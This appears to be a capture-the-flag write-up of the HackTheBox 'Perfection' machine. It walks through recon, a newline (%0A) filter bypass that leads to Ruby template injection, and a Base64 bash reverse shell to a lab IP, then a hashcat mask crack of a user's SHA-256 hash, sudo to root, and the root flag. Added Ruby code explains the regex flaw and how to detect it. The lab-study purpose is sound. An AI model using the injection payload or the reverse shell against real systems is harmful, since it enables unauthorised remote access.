HTB: Perfection Sanity Check | CBBH - CPTS

These notes serve primarily as a validation and reference tool for HTB Academy modules, documenting the insights gained from HTB machines/boxes that have contributed to my progression along the CBBH & CPTS path from Hackthebox. They are not designed as instructional guides, but they do contain spoilers and insights the further you advance.


Sanity Checklist

A Hackthebox Academy subscription is required to view the information in each module.

Topic | Module
✅ Enumeration | GETTING STARTED
--- Did you enumerate everything?
✅ Nmap | SERVICE ENUMERATION
--- Have you done an nmap scan of all ports?
✅ Page Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF
--- Have you discovered all pages available?
✅ Vhost Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF
--- Any subdomains available?
✅ Directory Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF
--- Any other directories?
✅ Burp Intruder | USING WEB PROXIES
--- Have you intercepted all possible requests?
✅ Server-side Attacks | INTRO to SSI
--- Have you discovered a way to bypass the "Malicious input blocked" message?
✅ Shells & Payloads | REVERSE SHELLS
--- Have you found the right payload for a reverse shell?
✅ Cracking Passwords with Hashcat | DICTIONARY ATTACK
--- Did you find Susan's mail for cracking?
✅ Privilege Escalation | SUDO


⚠️ Contains spoilers ahead that assist beyond the Sanity Check above ⚠️



Recon

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80e479e85928df952dad574a4604ea70 (ECDSA)
|   256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqNwnyqGqYHNSIjQnv7hRU0UC9Q4oB4g9Pfzuj2qcG4
80/tcp open  http    syn-ack nginx
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Information Disclosure

<!-- Footer -->
 <footer>
<p class="copyright">Copyright Secure Student Tools. All rights reserved<br><b>Powered by WEBrick 1.7.0</b></p>
</footer>

Burp Interception

(screenshot: perfection_site)

Base64 encoded reverse shell command (the sed replaces the + in the Base64 output with %2b so that it survives URL decoding instead of being turned into a space)

╭─kali at kali in ~
╰─○ base64 <<< "bash -i >& /dev/tcp/10.10.14.2/1234 0>&1" | sed 's/\+/\%2b/'
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=

Payload Injection - Base64 - Reverse Shell

Burp Repeater request. Important note: %0A (a URL-encoded newline) is the bypass; everything placed after it is injected, including the reverse shell.

category1=History%0A<%25%3dsystem("echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=+|+base64+-d+|+bash");%25>&grade1=1&weight1=100&category2=00&grade2=0&weight2=0&category3=0&grade3=0&weight3=0&category4=0&grade4=0&weight4=0&category5=0&grade5=0&weight5=0

Foothold - Susan

susan@perfection:~$ id
id
uid=1001(susan) gid=1001(susan) groups=1001(susan), 27(sudo)
susan@perfection:~$

Susan is in the sudo group, but sudo requires her password.

Migration - SQLite database

It holds password hashes for several users.

(screenshot: perfection sql hashes)

Hashcat brute-forcing (mask attack)

╭─kali at kali in ~
╰─○ hashcat -m 1400 susan_hash.txt -a 3 'susan_nasus_?d?d?d?d?d?d?d?d?d'
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux) - Platform 
=========================================================
* Device #1: gameboy

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
* Raw-Hash

abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Wed Jul 17 00:34:36 2024 (22 secs)
Time.Estimated...: Wed Jul 17 00:34:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14500.5 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324567040/1000000000 (32.46%)
Rejected.........: 0/324567040 (0.00%)
Restore.Point....: 324550656/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_354540610 -> susan_nasus_700440610

Started: Wed Jul 17 00:34:28 2024
Stopped: Wed Jul 17 00:34:27 2024
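To put the hashcat run above in perspective, here is an added Ruby example (not from this page or from the box) that computes how many candidates a hashcat mask expands to, the worst-case time to exhaust it at the reported speed, and whether a candidate plaintext matches an unsalted SHA-256 digest (hashcat mode 1400). The charset sizes are hashcat's built-in ones (?l, ?u, ?d, ?s, ?a, ?h, ?H); the mask, speed and hash values in the sample run are taken from the output above.

```ruby
require 'digest'

# Sizes of hashcat's built-in mask charsets.
MASK_CHARSETS = {
  'l' => 26, 'u' => 26, 'd' => 10, 's' => 33, 'a' => 95, 'h' => 16, 'H' => 16
}.freeze

# Number of candidates a hashcat mask expands to. Literal characters such as
# "susan_nasus_" contribute a factor of 1; "?d" contributes 10, "?l" 26, etc.
def mask_keyspace(mask)
  total = 1
  i = 0
  while i < mask.length
    if mask[i] == '?' && MASK_CHARSETS.key?(mask[i + 1])
      total *= MASK_CHARSETS[mask[i + 1]]
      i += 2
    else
      i += 1
    end
  end
  total
end

# Worst-case seconds to exhaust a mask at a given speed (hashes per second).
def worst_case_seconds(mask, hashes_per_second)
  mask_keyspace(mask).to_f / hashes_per_second
end

# Does the candidate plaintext hash to the stored unsalted SHA-256 digest?
# No salt and no iteration count means one cheap digest per guess.
def sha256_matches?(candidate, hex_digest)
  Digest::SHA256.hexdigest(candidate) == hex_digest.downcase
end

if __FILE__ == $PROGRAM_NAME
  mask  = 'susan_nasus_?d?d?d?d?d?d?d?d?d'      # mask from the hashcat run above
  speed = 14_500_500                            # 14500.5 kH/s from Speed.#1 above
  puts "keyspace for #{mask}: #{mask_keyspace(mask)}"
  puts "worst case at #{speed} H/s: #{worst_case_seconds(mask, speed).round(1)} s"
  # Hash and plaintext as printed by hashcat above.
  stored = 'abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f'
  puts "recovered plaintext verifies: #{sha256_matches?('susan_nasus_413759210', stored)}"
end
```

With a fixed prefix, the nine ?d positions leave only 10^9 candidates, which at 14.5 MH/s is about 69 seconds worst case; the output above stopped at 32% after 22 seconds, consistent with that figure. The "Not-Salted" and "Not-Iterated" optimizers hashcat lists are the reason it is this cheap: each guess costs one SHA-256 call, whereas a salted, iterated password hash would multiply the per-guess cost and remove the benefit of attacking several users' hashes at once.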

Root flag (root.txt)

susan@perfection:~$ sudo su
[sudo] password for susan: 
root@perfection:/home/susan# cd /root
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
f572e32a1023520404b1ab773c8ea534
root@perfection:~#

Important Bypass

The newline (\n), URL-encoded as %0A, was the important bypass for injecting a payload with a reverse shell.
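Why a single %0A gets past an input check, for the Payload Injection section and this Important Bypass note, as an added Ruby example that is not the box's application code: the app runs on WEBrick, so the check is shown the way a Ruby developer would typically write it. The real "Malicious input blocked" validation is not shown on this page, so the one-alphanumeric-token regex below is an assumption chosen to illustrate the mechanism. In Ruby, ^ and $ match at line boundaries, so a value whose first line is clean passes even if a second line follows the newline; \A and \z anchor to the whole string.

```ruby
require 'cgi'

# Constructed example: two versions of an allow-list check for a form field
# such as category1. The one-token alphanumeric rule is an assumption; the
# page does not show the application's real validation code.

# Line-anchored: in Ruby, ^ and $ match at the start and end of any LINE,
# so "History\n<anything>" passes because the first line alone is inspected.
def line_anchored_ok?(value)
  value.match?(/^[a-zA-Z0-9]+$/)
end

# \Z is a trap as well: it also matches just before one trailing newline.
def capital_z_ok?(value)
  value.match?(/\A[a-zA-Z0-9]+\Z/)
end

# String-anchored: \A and \z match only at the absolute start and end of
# the string, so an embedded or trailing newline fails the check.
def string_anchored_ok?(value)
  value.match?(/\A[a-zA-Z0-9]+\z/)
end

# Decode a raw form value (as it appears in the Burp request, with %0A and
# + encoding) the way the server would, then run it through both checks.
def check_both(raw_param)
  value = CGI.unescape(raw_param)
  { line_anchored: line_anchored_ok?(value), string_anchored: string_anchored_ok?(value) }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample values: a clean one, one with a second line after %0A,
  # and one with only a trailing newline.
  %w[History History%0Asecond+line History%0A].each do |raw|
    puts "#{raw.inspect} -> #{check_both(raw)}"
  end
end
```

The detection side follows from the same observation: a form field that is supposed to hold one short category name but arrives containing a newline, or template delimiters such as <%= and %>, is worth alerting on at the proxy or in the access log, regardless of what the application's own filter decides.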